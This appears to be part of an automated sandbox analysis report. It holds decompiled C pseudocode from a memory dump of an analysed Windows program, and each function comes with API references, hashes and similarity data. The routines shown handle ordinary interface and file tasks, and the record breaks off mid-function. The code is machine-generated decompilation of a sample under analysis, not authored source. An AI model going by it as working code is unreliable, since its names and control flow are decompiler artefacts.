                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = _v1028 & 0x00000000;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                				_t28 =  &_v516;
                                                                                                                				E00407250(_t28, _t17);
                                                                                                                				_push(_t28);
                                                                                                                				_push(L"</%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t26, _a4,  &_v1028);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v8198;
                                                                                                                				short _v8200;
                                                                                                                				void* _t9;
                                                                                                                				void* _t12;
                                                                                                                				intOrPtr _t19;
                                                                                                                				intOrPtr _t20;
                                                                                                                
                                                                                                                				_t19 = __ecx;
                                                                                                                				_t9 = E0040B550(0x2004, __ecx);
                                                                                                                				_t20 = _t19;
                                                                                                                				if(_t20 == 0) {
                                                                                                                					_t20 =  *0x40fe24; // 0x0
                                                                                                                				}
                                                                                                                				_t25 =  *0x40fb90;
                                                                                                                				if( *0x40fb90 != 0) {
                                                                                                                					_v8200 = _v8200 & 0x00000000;
                                                                                                                					memset( &_v8198, 0, 0x2000);
                                                                                                                					_push(_t20);
                                                                                                                					_t12 = 5;
                                                                                                                					E00405E8D(_t12);
                                                                                                                					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                						SetWindowTextW(_a4,  &_v8200);
                                                                                                                					}
                                                                                                                					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				struct HINSTANCE__* _t11;
                                                                                                                				struct HINSTANCE__** _t14;
                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                                					_t11 = E00405436(L"winsta.dll");
                                                                                                                					 *_t14 = _t11;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t15 = _t14[1];
                                                                                                                				if(_t15 == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _t21;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t24;
                                                                                                                				signed int _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t44;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t51;
                                                                                                                				int _t52;
                                                                                                                				void** _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_t53 = __esi;
                                                                                                                				_t1 =  &(_t53[1]); // 0x0
                                                                                                                				_t51 =  *_t1;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t51 <= 0) {
                                                                                                                					L4:
                                                                                                                					_t2 =  &(_t53[2]); // 0x8
                                                                                                                					_t33 =  *_t53;
                                                                                                                					_t23 =  *_t2 + _t51;
                                                                                                                					_t46 = 8;
                                                                                                                					_t53[1] = _t23;
                                                                                                                					_t24 = _t23 * _t46;
                                                                                                                					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                					L0040B26C();
                                                                                                                					_t10 =  &(_t53[1]); // 0x0
                                                                                                                					 *_t53 = _t24;
                                                                                                                					memset(_t24, 0,  *_t10 << 3);
                                                                                                                					_t52 = _t51 << 3;
                                                                                                                					memcpy( *_t53, _t33, _t52);
                                                                                                                					if(_t33 != 0) {
                                                                                                                						_push(_t33);
                                                                                                                						L0040B272();
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                				} else {
                                                                                                                					_t44 =  *__esi;
                                                                                                                					_t48 = _t44;
                                                                                                                					while( *_t48 != 0) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						_t48 = _t48 + 8;
                                                                                                                						_t58 = _t21 - _t51;
                                                                                                                						if(_t58 < 0) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_t31 = _t21 << 3;
                                                                                                                					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                				}
                                                                                                                				L7:
                                                                                                                				return 1;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                                				void* _v8;
                                                                                                                				wchar_t* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				char _v40;
                                                                                                                				long _v564;
                                                                                                                				char* _t18;
                                                                                                                				char* _t22;
                                                                                                                				wchar_t* _t23;
                                                                                                                				intOrPtr* _t24;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				intOrPtr _t30;
                                                                                                                				void* _t35;
                                                                                                                				char* _t36;
                                                                                                                
                                                                                                                				_t18 =  &_v8;
                                                                                                                				_t30 = 0;
                                                                                                                				__imp__SHGetMalloc(_t18);
                                                                                                                				if(_t18 >= 0) {
                                                                                                                					_v40 = _a4;
                                                                                                                					_v28 = _a8;
                                                                                                                					_t22 =  &_v40;
                                                                                                                					_v36 = 0;
                                                                                                                					_v32 = 0;
                                                                                                                					_v24 = 4;
                                                                                                                					_v20 = E0040AC81;
                                                                                                                					_v16 = __esi;
                                                                                                                					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                                					_t36 = _t22;
                                                                                                                					if(_t36 != 0) {
                                                                                                                						_t23 =  &_v564;
                                                                                                                						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                                						if(_t23 != 0) {
                                                                                                                							_t30 = 1;
                                                                                                                							wcscpy(__esi,  &_v564);
                                                                                                                						}
                                                                                                                						_t24 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                                						_t26 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                				long _v8;
                                                                                                                				long _v12;
                                                                                                                				long _t13;
                                                                                                                				void* _t14;
                                                                                                                				struct HWND__* _t24;
                                                                                                                
                                                                                                                				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                				_v12 = _t13;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t13 <= 0) {
                                                                                                                					L3:
                                                                                                                					_t14 = 0;
                                                                                                                				} else {
                                                                                                                					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 < _v12) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                					_t14 = 1;
                                                                                                                				}
                                                                                                                				L4:
                                                                                                                				return _t14;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                				long _v8;
                                                                                                                				void _v8199;
                                                                                                                				char _v8200;
                                                                                                                
                                                                                                                				E0040B550(0x2004, __ecx);
                                                                                                                				_v8200 = 0;
                                                                                                                				memset( &_v8199, 0, 0x1fff);
                                                                                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                                				int _t7;
                                                                                                                				void** _t11;
                                                                                                                
                                                                                                                				_t11 = __eax;
                                                                                                                				if( *0x4101b4 == 0) {
                                                                                                                					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                                					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                                					 *0x4101b4 = 1;
                                                                                                                					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                                					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                                					 *0x40f2f4 = _t7;
                                                                                                                					return 1;
                                                                                                                				} else {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}





                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                                				int _t10;
                                                                                                                				int _t12;
                                                                                                                				void* _t23;
                                                                                                                				wchar_t* _t24;
                                                                                                                				signed int _t25;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t25 = wcslen(__edi);
                                                                                                                				_t10 = wcslen(_a4);
                                                                                                                				_t23 = _t10 + _t25;
                                                                                                                				if(_t23 >= 0x3ff) {
                                                                                                                					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                                					if(_t12 > 0) {
                                                                                                                						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					wcscat(__edi + _t25 * 2, _a4);
                                                                                                                				}
                                                                                                                				return _t24;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				struct HWND__* _t11;
                                                                                                                				struct HWND__* _t14;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				_t16 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                                				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                                				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                                				do {
                                                                                                                					E00402D99(_t15, _t16);
                                                                                                                					_t11 = GetWindow(_t15, 2);
                                                                                                                					_t15 = _t11;
                                                                                                                				} while (_t15 != 0);
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
                                                                                                                				intOrPtr _t1;
                                                                                                                				intOrPtr _t2;
                                                                                                                				intOrPtr _t3;
                                                                                                                				intOrPtr _t4;
                                                                                                                
                                                                                                                				_t1 =  *0x41c458;
                                                                                                                				if(_t1 != 0) {
                                                                                                                					_push(_t1);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t2 =  *0x41c460;
                                                                                                                				if(_t2 != 0) {
                                                                                                                					_push(_t2);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t3 =  *0x41c45c;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_push(_t3);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t4 =  *0x41c464;
                                                                                                                				if(_t4 != 0) {
                                                                                                                					_push(_t4);
                                                                                                                					L0040B272();
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				return _t4;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				wchar_t* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t39;
                                                                                                                				wchar_t* _t41;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t48;
                                                                                                                				wchar_t* _t53;
                                                                                                                				wchar_t* _t62;
                                                                                                                				void* _t66;
                                                                                                                				intOrPtr* _t68;
                                                                                                                				void* _t70;
                                                                                                                				wchar_t* _t75;
                                                                                                                				wchar_t* _t79;
                                                                                                                
                                                                                                                				_t66 = __ebx;
                                                                                                                				_t75 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                                						_t68 = _a8;
                                                                                                                						if(_t68 != _t75) {
                                                                                                                							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                                						} else {
